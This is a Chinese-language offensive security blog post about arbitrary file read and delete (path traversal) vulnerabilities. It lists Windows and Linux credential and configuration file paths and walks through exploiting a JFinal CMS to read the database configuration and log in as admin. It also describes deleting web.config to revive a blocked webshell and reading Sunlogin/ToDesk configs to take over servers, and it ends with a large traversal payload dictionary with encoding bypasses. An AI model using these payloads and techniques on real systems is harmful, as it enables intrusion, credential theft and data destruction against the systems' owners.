1. 什么是任意文件读取/删除漏洞
任意文件读取/删除漏洞,多存在一些文件查看/删除处,由于相关代码未做严格限制,导致跨目录甚至跨盘符情况产生,进而可以查看/删除其他文件,例如数据库配置文件,网站源码等信息。例如,某处相关查看/删除图片的url为http://127.0.0.1/?fileName=/images/image.png,我们可以对最后的参数进行FUZZ,例如http://127.0.0.1/?fileName=/../../../../../../etc/passwd,进而测试是否存在任意文件读取/删除漏洞。
2. 相关漏洞有什么用
有小伙伴可能会问了,存在任意文件读取漏洞又怎么样呢?getshell才是我的最终目的,这个漏洞只能算个中危。
其实不然,我们通过此漏洞,可以读取到相关数据库账号配置密码,例如MYSQL和MSSQL等数据库的配置信息,通过相关配置信息登录相关数据库,例如获取相关系统登录密码,去后台寻找更多可利用的点。若是存在相关条件,可以看看我前面的几篇博客。
Mysql数据库getshell方法_mysql getshell-优快云博客
redis未授权到getshell_redis未授权访问getshell-优快云博客
若是还不会的话,那就当个脚本小子,直接利用图形化工具,一键Getshell,这里推荐MDUT和Syla。当然,工具只是一部分,可能还有更好用的其他工具,欢迎师傅们推荐。
还有一些其他利用的细微点,我将在第五小节继续深入。
3. 注意的相关文件
以下是相关常见利用思路的文件地址,例如读取/etc/passwd,大家对于/etc/passwd文件多认为是测试漏洞是否存在的验证文件。今年护网时,我所防守的单位就是因为有个运维用户的弱口令,进而导致子公司内网沦陷(勒索演练)。其用户名虽然奇怪,但是密码简单。当然不仅仅只是我给的这些文件,还有一些小tips,在第五小节大家就可以看到了。
windows敏感文件:
boot.ini #查看系统版本
c:/windows/php.ini #php配置信息
c:/windows/my.ini #MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD #mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini #存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml #查看IIS的虚拟主机配置
c:\windows\repair\sam #WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe #6.0版本以前的serv-u管理员密码
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件 #存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf #查看WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf #查看jsp开发的网站resin文件配置信息.
c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf #查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
C:\mysql\data\mysql\user.MYD #存在MYSQL系统中的用户密码 C:\Windows\System32\drivers\etc\hostswinserver配置Telnet信息
Linux敏感文件:
/etc/httpd/conf/httpd.conf
/etc/rc.local 有时可以读出来apache的路径
/usr/local/apache/conf/httpd.conf
/var/www/html/apache/conf/httpd.conf
/home/httpd/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/etc/apache/httpd.conf
/usr/local/lib/php.ini
/etc/hosts.deny 定义禁止访问本机的主机
/etc/bashrc bash shell 的系统全局配置
/etc/group 系统用户组的定义文件
/etc/httpd/httpd.conf
/etc/issue 显示Linux核心的发行版本信息(用于本地登陆用户)
/etc/issue/net 显示Linux核心和发行版本信息(用于远程登陆用户)----没成功
/etc/ssh/ssh_config ssh配置文件
/etc/termcap 终端定义和配置文件
/etc/xinetd.d
/etc/mtab 包含当前安装的文件系统列表 有时可以读取到当前网站的路径
redhat-release:包含识别当前Red Hat 版本号的字符串
shells:列出可用在系统上的shell命令行解释器(bash,sh,csh等).
/etc/vsftpd/vsftpd.conf
/etc/xinetd.conf xinetd 配置文件
/etc/protocols 列举当前可用的协议
/etc/logrotate.conf 维护 /var/log 目录中的日志文件
/etc/ld.so.conf “动态链接程序”(Dynamic Linker)的配置。
我在我的系统中安装了非常有用的 wget 实用程序。/etc/ 中有一个 /etc/wgetrc 文件
/etc/wgetrc
Linux操作系统用户配置文件
/etc/passwd
/etc/shadow
/etc/inputrc
DNS客户机配置文件,设置DNS服务器的IP地址及DNS域名
/etc/resolv.conf
内容为Default Router的ip地址
Redhat 5.x: /etc/sysconfig/network
/etc/sendmail.cf (Linux) Sendmail(EMAIL服务器)配置文件
/etc/sendmail.cw 本地主机名
4. JFinal代码审计小案例
4.1. 环境搭建
这里我们创建导入相关数据库后,点击启动即可。需要相关源码或者搭建辅助,可以在后台或者评论区留言。
默认密码admin/123456。
4.2. 漏洞点发现
相关任意文件读取/删除漏洞,多存在于文件查看以及文件删除处,这里我们在运行相关功能点后,在burpsuit查看相关数据包,这种是通过功能点检查是否存在漏洞,过一段时间,我将这个CMS进行反向查找漏洞为出发点,撰写一篇博客。
4.2.1. 任意文件删除漏洞
这里我们看到有一个数据库备份文件还原以及删除操作,这里就可以尝试相关操作,是否有存在漏洞的可能。
我们将此文件删除试试,并查看burpsuit相关数据包。
可以看到,他是通过name值进行的传参,我们查找/admin/database/delete,观察其是如何实现的。
操作的主要代码为
public void delete() {
String name = getPara("name");
//通过getPara传入name参数
BackupUtils.delete(name);
//删除文件
renderJson(Feedback.success(new HashMap<>()));
//显示结果
}
我们跟进ctrl+鼠标左键快捷功能,跟进查找delete()函数,查看其具体用法。
public static void delete(String backupName){
File backupFile = new File(PathKit.getWebRootPath()+"/"+CommonAttribute.BACK_PATH+"/"+backupName);
//将backupName参数直接进行拼接,getWebRootPath()为获取当前路径函数
//CommonAttribute.BACK_PATH是一个固定路径值
if(!backupFile.exists()){
return;
}
FileUtils.deleteQuietly(backupFile);
//删除backupFile所传递的文件
}
相关代码已经分析完毕,我们就来测验一下,首先找到文件所在的位置。这里我们使用everything进行全局搜索。
在其上级路径创建一个名为1.txt的文件。
将原来数据包中的name值,修改为/../1.txt,发送发现1.txt文件消失不见。
这里还原的代码,不会显示相关文件的具体信息,因而任意文件读取漏洞在这个接口就不存在。
public void restore(){
String name = getPara("name");
BackupUtils.restore(name);
renderJson(Feedback.success(new HashMap<>()));
}
public static void restore(String backupName){
File backupFile = new File(PathKit.getWebRootPath()+"/"+CommonAttribute.BACK_PATH+"/"+backupName);
if(!backupFile.exists()){
return;
}
try {
List<String> lines = FileUtils.readLines(backupFile,"UTF-8");
StringBuilder sql = new StringBuilder();
for(String line : lines){
if(line.startsWith("--")){
continue;
}
sql.append(line);
if(line.endsWith(";")){
Db.update(sql.toString());
sql.delete(0, sql.length());
}
}
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
4.2.2. 任意文件读取漏洞
在模板管理这一功能点,我们访问相关文件,并查看burpsuit中数据包的构成。
发现一个数据包存在fileName参数
全局搜索查找/admin/template/edit接口
public void edit() {
String fileName = getPara("fileName");
String directory = getPara("directory");
//获取fileName和directory参数
if (StringUtils.isBlank(fileName)) {
render(CommonAttribute.ADMIN_ERROR_VIEW);
return;
//如果文件名为空,则报错
}
setAttr("directory", directory);
setAttr("fileName", fileName);
String filePath = "";
if(StringUtils.isNotBlank(directory)){
filePath = "/"+directory.replaceAll(",", "/")+"/"+fileName;
//如果directory不为空的话,将文件名拼接到目录参数后
//directory.replaceAll(",", "/")是将目录中的","替换为"/"
}else{
filePath = "/"+fileName;
//如果directory为空的话,filename直接进行拼接
}
setAttr("content", StringEscapeUtils.escapeHtml(TemplateUtils.read(filePath)));
render(getView("template/edit"));
//查看相关文件
}
这里我们定位到原文件所在位置。
在上级目录中同样创建一个名为1.txt的文件并向其写入123。
设置fileName参数为/../1.txt,可以看到,跨目录读取成功。
读取数据库配置文件试试,读取成功。
登录数据库,查找后台密码
使用解密后的密码登录成功
这里也存在任意文件删除漏洞,感兴趣的小伙伴可以自己尝试,寻找相关漏洞功能点。
5. 实战中其他的利用思路
5.1.1. 删除相关配置文件
我们通过某一文件上传漏洞上传shell后,发现访问弹出403,这可能是相关web.config文件存在相关配置,导致了上传的文件无法正常访问,这时候通过任意文件删除漏洞,删除相关文件,即可突破限制,但是不能随意删除相关文件,可能删除后服务器无法启动。这里以“希潭实验室”大佬发布的文章举例。
上传shell后,第二天发现访问shell显示403,经过判断,猜测蓝队防守方做了加固,在webshell所在文件夹下放置了web.config文件,更改了默认配置,使脚本在当前目录下不能执行。
通过审计源码找到任意文件删除漏洞,突破蓝队防守。
原文链接:第99篇:记一次红队攻防中.Net代码审计与防守方的对抗过程
5.1.2. 读取相关远控文件的配置文件
通过任意文件读取漏洞读取远控程序的配置文件。例如向日葵还有Todesk等远控软件,通过工具解密后,即可直接登录该服务器。
相关配置文件的默认路径如下:
向日葵默认配置文件路径:
安装版:C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
便携版(绿色版):C:\ProgramData\Oray\SunloginClient\config.ini
读取后需要对密码进行解密,Todest是将相关密钥直接进行替换。这里以“剑客古月”的文章举例。不过他是getshell后,获取的配置文件信息,替换后再进行的登录。我们可以尝试通过任意文件读取漏洞,来读取相关配置文件。一般存在于外网服务器内。相关运维人员为了方便运维,就会下载这类远控工具。
5.1.3. 读取社交软件图片信息
还有一个案例,该站点存在目录遍历漏洞,可以访问所有文件,目录下存有微信聊天记录的相关图片信息,且以文档树的方式进行展现,但是无法访问,好在该站点存在一个任意文件下载漏洞,通过遍历相关如片信息,在一个截图中获得了某系统的账号密码,最终拿下了域控。这个文章是很久之前看到的,具体作者忘记是谁了。这种思路也很新奇,也可以尝试读取其他的相关信息。
5.1.4. 其他
我们获取了某个系统的任意文件读取漏洞之后,首先就是要知道相关网站的目录接口是什么,读取网站源码,通过FUZZ方式获取配置文件信息。DecryptTools中记录了相关常见系统的数据库默认路径。大家也可以通过日常的密码本收集,来打造一个属于自己的字典。
这里推荐我用的一个字典合集
..0x5c..0x5c{FILE}
..0x5c{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}%00index.html
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE};index.html
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}%00index.html
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE};index.html
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}%00index.html
..%2f..%2f..%2f..%2f..%2f..%2f{FILE};index.html
..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f{FILE}%00index.html
..%2f..%2f..%2f..%2f..%2f{FILE};index.html
..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f{FILE}%00index.html
..%2f..%2f..%2f..%2f{FILE};index.html
..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f{FILE}%00index.html
..%2f..%2f..%2f{FILE};index.html
..%2f..%2f{FILE}
..%2f..%2f{FILE}%00index.html
..%2f..%2f{FILE};index.html
..%2f{FILE}
..%2f{FILE}%00index.html
..%2f{FILE};index.html
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}%00index.html
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE};index.html
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}%00index.html
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE};index.html
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}%00index.html
..%5c..%5c..%5c..%5c..%5c..%5c{FILE};index.html
..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c{FILE}%00index.html
..%5c..%5c..%5c..%5c..%5c{FILE};index.html
..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c{FILE}%00index.html
..%5c..%5c..%5c..%5c{FILE};index.html
..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c{FILE}%00index.html
..%5c..%5c..%5c{FILE};index.html
..%5c..%5c{FILE}
..%5c..%5c{FILE}%00index.html
..%5c..%5c{FILE};index.html
..%5c{FILE}%00index.html
..%5c{FILE};index.html
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af..%25c0%25af{FILE}
..%25c0%25af{FILE}
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c..%25c1%259c{FILE}
..%25c1%259c{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}%00index.html
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE};index.html
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}%00index.html
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE};index.html
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}%00index.html
..%252f..%252f..%252f..%252f..%252f..%252f{FILE};index.html
..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f{FILE}%00index.html
..%252f..%252f..%252f..%252f..%252f{FILE};index.html
..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f{FILE}%00index.html
..%252f..%252f..%252f..%252f{FILE};index.html
..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f{FILE}%00index.html
..%252f..%252f..%252f{FILE};index.html
..%252f..%252f{FILE}
..%252f..%252f{FILE}%00index.html
..%252f..%252f{FILE};index.html
..%252f{FILE}
..%252f{FILE}%00index.html
..%252f{FILE};index.html
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}%00index.html
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE};index.html
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}%00index.html
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE};index.html
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}%00index.html
..%255c..%255c..%255c..%255c..%255c..%255c{FILE};index.html
..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c{FILE}%00index.html
..%255c..%255c..%255c..%255c..%255c{FILE};index.html
..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c{FILE}%00index.html
..%255c..%255c..%255c..%255c{FILE};index.html
..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c{FILE}%00index.html
..%255c..%255c..%255c{FILE};index.html
..%255c..%255c{FILE}
..%255c..%255c{FILE}%00index.html
..%255c..%255c{FILE};index.html
..%255c{FILE}
..%255c{FILE}%00index.html
..%255c{FILE};index.html
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
..%%32%66..%%32%66..%%32%66{FILE}
..%%32%66..%%32%66{FILE}
..%%32%66{FILE}
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
..%%35%63..%%35%63..%%35%63{FILE}
..%%35%63..%%35%63{FILE}
..%%35%63{FILE}
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
..%c0%2f..%c0%2f..%c0%2f{FILE}
..%c0%2f..%c0%2f{FILE}
..%c0%2f{FILE}
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
..%c0%5c..%c0%5c..%c0%5c{FILE}
..%c0%5c..%c0%5c{FILE}
..%c0%5c{FILE}
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
..%c0%af..%c0%af..%c0%af{FILE}
..%c0%af..%c0%af{FILE}
..%c0%af{FILE}
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
..%c1%9c..%c1%9c..%c1%9c{FILE}
..%c1%9c..%c1%9c{FILE}
..%c1%9c{FILE}
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}
..%u2215..%u2215..%u2215..%u2215{FILE}
..%u2215..%u2215..%u2215{FILE}
..%u2215..%u2215{FILE}
..%u2215{FILE}
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}
..%u2216..%u2216..%u2216..%u2216{FILE}
..%u2216..%u2216..%u2216{FILE}
..%u2216..%u2216{FILE}
..%u2216{FILE}
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
..%uEFC8..%uEFC8..%uEFC8{FILE}
..%uEFC8..%uEFC8{FILE}
..%uEFC8{FILE}
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
..%uF025..%uF025..%uF025..%uF025{FILE}
..%uF025..%uF025..%uF025{FILE}
..%uF025..%uF025{FILE}
..%uF025{FILE}
........................................................................../../../../../../../../{FILE}
........................................................................../../../../../../../{FILE}
........................................................................../../../../../../{FILE}
........................................................................../../../../../{FILE}
........................................................................../../../../{FILE}
........................................................................../../../{FILE}
........................................................................../../{FILE}
........................................................................../{FILE}
..........................................................................\..\..\..\..\..\..\..\{FILE}
..........................................................................\..\..\..\..\..\..\{FILE}
..........................................................................\..\..\..\..\..\{FILE}
..........................................................................\..\..\..\..\{FILE}
..........................................................................\..\..\..\{FILE}
..........................................................................\..\..\{FILE}
..........................................................................\..\{FILE}
..........................................................................\{FILE}
..../..../..../..../..../..../..../..../{FILE}
..../..../..../..../..../..../..../{FILE}
..../..../..../..../..../..../{FILE}
..../..../..../..../..../{FILE}
..../..../..../..../{FILE}
..../..../..../{FILE}
..../..../{FILE}
..../{FILE}
....\....\....\....\....\....\....\....\{FILE}
....\....\....\....\....\....\....\{FILE}
....\....\....\....\....\....\{FILE}
....\....\....\....\....\{FILE}
....\....\....\....\{FILE}
....\....\....\{FILE}
....\....\{FILE}
....\{FILE}
.../.../.../.../.../.../.../.../{FILE}
.../.../.../.../.../.../.../{FILE}
.../.../.../.../.../.../{FILE}
.../.../.../.../.../{FILE}
.../.../.../.../{FILE}
.../.../.../{FILE}
.../.../{FILE}
.../{FILE}
...\...\...\...\...\...\...\...\{FILE}
...\...\...\...\...\...\...\{FILE}
...\...\...\...\...\...\{FILE}
...\...\...\...\...\{FILE}
...\...\...\...\{FILE}
...\...\...\{FILE}
...\...\{FILE}
...\{FILE}
../../../../../../../../{FILE}
../../../../../../../../{FILE}%00index.html
../../../../../../../../{FILE};index.html
../../../../../../../{FILE}
../../../../../../../{FILE}%00index.html
../../../../../../../{FILE};index.html
../../../../../../{FILE}
../../../../../../{FILE}%00index.html
../../../../../../{FILE};index.html
../../../../../{FILE}
../../../../../{FILE}%00index.html
../../../../../{FILE};index.html
../../../../{FILE}
../../../../{FILE}%00index.html
../../../../{FILE};index.html
../../../{FILE}
../../../{FILE}%00index.html
../../../{FILE};index.html
../../{FILE}
../../{FILE}%00index.html
../../{FILE};index.html
..//..//..//..//..//..//..//..//{FILE}
..//..//..//..//..//..//..//{FILE}
..//..//..//..//..//..//{FILE}
..//..//..//..//..//{FILE}
..//..//..//..//{FILE}
..//..//..//{FILE}
..//..//{FILE}
..///..///..///..///..///..///..///..///{FILE}
..///..///..///..///..///..///..///{FILE}
..///..///..///..///..///..///{FILE}
..///..///..///..///..///{FILE}
..///..///..///..///{FILE}
..///..///..///{FILE}
..///..///{FILE}
..///{FILE}
..//{FILE}
../{FILE}
../{FILE}%00index.html
../{FILE};index.html
..\..\..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\..\{FILE}%00index.html
..\..\..\..\..\..\..\..\{FILE};index.html
..\..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\{FILE}%00index.html
..\..\..\..\..\..\..\{FILE};index.html
..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\{FILE}%00index.html
..\..\..\..\..\..\{FILE};index.html
..\..\..\..\..\{FILE}
..\..\..\..\..\{FILE}%00index.html
..\..\..\..\..\{FILE};index.html
..\..\..\..\{FILE}
..\..\..\..\{FILE}%00index.html
..\..\..\..\{FILE};index.html
..\..\..\{FILE}
..\..\..\{FILE}%00index.html
..\..\..\{FILE};index.html
..\..\{FILE}
..\..\{FILE}%00index.html
..\..\{FILE};index.html
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}
..\\..\\..\\..\\..\\..\\..\\{FILE}
..\\..\\..\\..\\..\\..\\{FILE}
..\\..\\..\\..\\..\\{FILE}
..\\..\\..\\..\\{FILE}
..\\..\\..\\{FILE}
..\\..\\{FILE}
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
..\\\..\\\..\\\..\\\..\\\{FILE}
..\\\..\\\..\\\..\\\{FILE}
..\\\..\\\..\\\{FILE}
..\\\..\\\{FILE}
..\\\{FILE}
..\\{FILE}
..\{FILE}
..\{FILE}%00index.html
..\{FILE};index.html
./.././.././.././.././.././.././.././../{FILE}
./.././.././.././.././.././.././../{FILE}
./.././.././.././.././.././../{FILE}
./.././.././.././.././../{FILE}
./.././.././.././../{FILE}
./.././.././../{FILE}
./.././../{FILE}
./../{FILE}